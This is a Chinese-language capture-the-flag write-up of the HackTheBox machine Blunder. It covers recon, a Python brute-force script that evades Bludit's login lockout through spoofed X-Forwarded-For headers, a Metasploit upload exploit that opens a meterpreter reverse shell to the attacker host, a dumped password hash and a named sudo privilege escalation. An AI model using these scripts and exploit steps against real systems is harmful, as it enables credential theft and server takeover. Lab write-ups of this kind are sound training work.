HTB-靶机-Blunder

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.191

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

信息枚举收集
https://github.com/codingo/Reconnoitre 跟autorecon类似
autorecon 10.10.10.191 -o ./Blunder-autorecon

masscan -p1-65535 10.10.10.191 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '
' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.191

扫描结果就开放了个80端口，访问一把

没看到啥有价值的东西，看看网页源码

确认使用bludit版本为3.9.2的cms程序，网上搜索一把发现有暴力破解绕过漏洞，详情：https://rastating.github.io/bludit-brute-force-mitigation-bypass/

开始收集整理目标靶机的所有关键字作为密码字典，这里使用cewl进行收集，https://github.com/digininja/CeWL

cewl 10.10.10.191 > wordlist.txt

收集的同时爆破下目录靶机网站的目录，通用使用rustbuster二进制爆破工具

爆破目录新工具
https://github.com/phra/rustbuster

下载二进制文件
wget https://github.com/phra/rustbuster/releases/download/v3.0.3/rustbuster-v3.0.3-x86_64-unknown-linux-gnu -O rustbuster

探测目录
./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15

如下结果：

kali@kali:~/Downloads/htb/blunder$ ./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15
~ rustbuster v3.0.3 ~ by phra & ps1dr3x ~

         _     _                 _         _           _        _                 _         _           _           _
        /   /\_              / /      /         / /     /\_              / /      /         /         / 
       /   / / /         _   / /       \_       / /     / / /         _   / /       \_       /         /   
      / /    \__      /\_/ / / \__  /\__     / / /     \__      /\_/ / / \__  /\__     / /      / /  
     / / / \_ \___    / / / / / \___/ /_    / / /     \___    / / / / / \___/ /_    / / / \_  / / / \_
    / / /_/ / /\__  /   / / /   /___/ / /  / / / \_   \__  /   / / /   /___/ / /  / /_/_ /_/ / / /_/ / /
   / / /__/ / / / /   / / /        / / /  /_/ / /  \___ / / /   / / /        / / /  /_/ /____/   / / /__/ /
  / / /_____/ / / /   / / _        / / /     / / /    \__// / /   / / _        / / /     / /\____/  / / /_____/
 / / /    / / /___/ / /_/\__/ / / / / /     / / /____\_  / / /___/ / /_/\__/ / / / / /     / / /______ / / /  
/ / /    / / /____/ / /___/ / /_/ /     / / /__________/ / /____/ / /___/ / /_/ /     / / /_______/ / /    
/_/    \_//_________/  \_____/  \_/      /_____________/_________/  \_____/  \_/      /__________/_/    \_/


[?] Started at  : 2021-05-08 10:55:03

GET     403 Forbidden                   http://10.10.10.191/.hta
GET     403 Forbidden                   http://10.10.10.191/.hta.php
GET     403 Forbidden                   http://10.10.10.191/.hta.txt
GET     403 Forbidden                   http://10.10.10.191/.hta.pdf
GET     403 Forbidden                   http://10.10.10.191/.htaccess
GET     403 Forbidden                   http://10.10.10.191/.htpasswd
GET     403 Forbidden                   http://10.10.10.191/.htpasswd.php
GET     403 Forbidden                   http://10.10.10.191/.htaccess.php
GET     403 Forbidden                   http://10.10.10.191/.htpasswd.pdf
GET     403 Forbidden                   http://10.10.10.191/.htaccess.txt
GET     403 Forbidden                   http://10.10.10.191/.htaccess.pdf
GET     403 Forbidden                   http://10.10.10.191/.htpasswd.txt
GET     200 OK                          http://10.10.10.191/0
GET     200 OK                          http://10.10.10.191/LICENSE
GET     200 OK                          http://10.10.10.191/about
GET     301 Moved Permanently           http://10.10.10.191/admin
                                                => http://10.10.10.191/admin/
GET     301 Moved Permanently           http://10.10.10.191/cgi-bin/
                                                => http://10.10.10.191/cgi-bin
GET     200 OK                          http://10.10.10.191/install.php
GET     200 OK                          http://10.10.10.191/robots.txt
GET     200 OK                          http://10.10.10.191/robots.txt
GET     403 Forbidden                   http://10.10.10.191/server-status
GET     200 OK                          http://10.10.10.191/todo.txt
  [00:09:19] ########################################   18620/18620   ETA: 00:00:00 req/s: 33

[?] Ended at: 2021-05-08 11:04:22

都访问了一把，得到一个todo.txt信息

提示有用户fergus准备放入新blog，刚好上面也发现了登录窗口

直接根据上面找到的exploit进行暴力破解绕过测试获取账号的密码，最终通过python2版本实现的密码暴力破解程序代码如下：

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []
words = open('wordlist.txt','r')

for line in words:
    line=line.rstrip()
    wordlist.append(line)

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

得到账号和密码

fergus:RolandDeschain

登录进去这里花了点时间验证，最后确认存在文件上次和目录遍历配合起来的远程代码执行漏洞，详情：https://github.com/bludit/bludit/issues/1081

我这方便就使用metasploit进行直接利用

msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.2
lhost => 10.10.14.2
msf5 exploit(linux/http/bludit_upload_images_exec) > set lport 8833
lport => 8833
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

[-] Exploit failed: One or more options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.2:8833
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading aanOwmocKW.png...
[*] Uploading .htaccess...
[*] Executing aanOwmocKW.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.2:8833 -> 10.10.10.191:50620) at 2021-05-08 14:16:30 +0800
[+] Deleted .htaccess


meterpreter >

通过翻看网站的根目录，发现除了3.9.2版本之外还有个3.10.0a版本

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

使用somd5进行破解密码

通过su直接切换至用户hugo

执行一把sudo -l

发现

(ALL, !root) /bin/bash

将其丢到Google里面搜索一把

https://www.exploit-db.com/exploits/47502

得到上面的提权漏洞，查看当前靶机的sudo版本

 刚好符合上述漏洞的利用版本范围，直接利用提权